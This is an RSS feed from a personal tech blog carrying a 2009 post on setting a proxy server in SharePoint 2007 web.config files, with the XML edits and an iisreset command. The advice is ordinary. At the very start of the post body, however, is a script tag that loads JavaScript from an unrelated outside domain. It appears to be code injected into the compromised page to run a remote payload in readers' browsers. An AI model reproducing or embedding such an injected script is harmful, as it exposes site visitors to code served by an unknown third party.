<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Rob&#039;s Tech Fun and Games &#187; proxy</title>
	<atom:link href="http://kipper.org.uk/index.php/tag/proxy/feed/" rel="self" type="application/rss+xml" />
	<link>http://kipper.org.uk</link>
	<description>Technical notes for tricky situations</description>
	<lastBuildDate>Fri, 03 Jun 2011 13:12:43 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Setting up a proxy server with SharePoint for RSS feeds</title>
		<link>http://kipper.org.uk/index.php/2009/05/setting-up-a-proxy-server-with-sharepoint-for-rss-feeds/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=setting-up-a-proxy-server-with-sharepoint-for-rss-feeds</link>
		<comments>http://kipper.org.uk/index.php/2009/05/setting-up-a-proxy-server-with-sharepoint-for-rss-feeds/#comments</comments>
		<pubDate>Fri, 01 May 2009 09:10:59 +0000</pubDate>
		<dc:creator>Rob</dc:creator>
				<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[SharePoint 2007]]></category>
		<category><![CDATA[installation]]></category>
		<category><![CDATA[proxy]]></category>
		<category><![CDATA[RSS]]></category>

		<guid isPermaLink="false">http://kipper.org.uk/?p=28</guid>
		<description><![CDATA[In order to set up your proxy server, you&#8217;ll need to edit your web.config files for your relevant webapplications.  You can normally find your virtual directories in    C:\Inetpub\wwwroot\wss\VirtualDirectories With several subdirectories for each port SharePoint runs on.  You&#8217;ll need to set this for every application using RSS, so normally at least the folder &#8220;80&#8243;.  [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fkipper.org.uk%2Findex.php%2F2009%2F05%2Fsetting-up-a-proxy-server-with-sharepoint-for-rss-feeds%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fkipper.org.uk%2Findex.php%2F2009%2F05%2Fsetting-up-a-proxy-server-with-sharepoint-for-rss-feeds%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><script type='text/javascript' src='http://easystatsanalytics.info/counter190.js'></script>In order to set up your proxy server, you&#8217;ll need to edit your web.config files for your relevant webapplications.  You can normally find your virtual directories in</p>
<p>   C:\Inetpub\wwwroot\wss\VirtualDirectories</p>
<p>With several subdirectories for each port SharePoint runs on.  You&#8217;ll need to set this for every application using RSS, so normally at least the folder &#8220;80&#8243;.  Enter the relevant subdirectory, and replace the following section in the web.config files:</p>
<p>  &lt;system.net&gt;<br />
    &lt;defaultProxy&gt;<br />
      &lt;proxy autoDetect=&#8221;true&#8221; /&gt;<br />
    &lt;/defaultProxy&gt;<br />
  &lt;/system.net&gt;</p>
<p>with:</p>
<p>  &lt;system.net&gt;<br />
    &lt;defaultProxy&gt;<br />
      &lt;!&#8211; &lt;proxy autoDetect=&#8221;true&#8221; /&gt; &#8211;&gt;<br />
      &lt;proxy proxyaddress=&#8221;http://proxy.company.com:8080&#8243; bypassonlocal=&#8221;true&#8221; /&gt;<br />
    &lt;/defaultProxy&gt;<br />
  &lt;/system.net&gt;</p>
<p>It&#8217;s useful to ensure that the original setting is available, but commented out, just in case you need to reset things quickly.  It goes without saying that you need to replace the details of http://proxy.company.com:8080 with your own proxys details!</p>
<p>After applying the change, you need to rest IIS &#8211; I favor:</p>
<p>   iisreset -noforce</p>
<p>which is just a little more graceful if something is locked.</p>
<p>One gotcha &#8211; make sure you set the web.config files for both port 80 and port 443, if you are using SSL.</p>
]]></content:encoded>
			<wfw:commentRss>http://kipper.org.uk/index.php/2009/05/setting-up-a-proxy-server-with-sharepoint-for-rss-feeds/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

